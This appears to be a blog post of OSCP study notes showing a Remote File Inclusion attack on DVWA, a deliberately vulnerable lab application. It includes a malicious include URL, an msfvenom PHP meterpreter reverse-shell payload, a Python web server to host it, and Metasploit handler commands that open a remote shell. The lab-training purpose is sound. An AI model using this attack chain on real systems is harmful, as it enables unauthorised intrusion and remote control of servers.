• 周二. 8月 16th, 2022

5G编程聚合网

5G时代下一个聚合的编程学习网

热门标签

OSCP Security Technology

admin

11月 28, 2021

OSCP Security Technology – Remote File Inclusion(RFI)

DVWA

Download and install DVWA .

https://dvwa.co.uk/

Pre-set

Browser the following website.(admin/password)

http://192.168.2.52/dvwa/login.php

image-20210815201045336

Set the security level to low.

image-20210815201143846

File Inclusion

Click File Inclusion button.

image-20210815201354319

Modify the URL:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

image-20210815201734453

Download php reverse shell from pentestmonkey website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Move the shell file to /var/www/html, and modify the parameters – IP/port.

image-20210815202509965

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.26 LPORT=4444 >> exploit.php

image-20210815203800569

service apache2 stop
python -m SimpleHTTPServer 80

image-20210815204048311

msfconsole
use exploit/multi/handler
set LHOST 192.168.2.26
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit

image-20210815204748557

Browser the following url:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://192.168.2.26/exploit.php

image-20210815205429724

Result:

  1. image-20210815205543717

  2. Create a new session

image-20210815205721047

shell

image-20210815205814606

相信未来 – 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。

发表回复

您的电子邮箱地址不会被公开。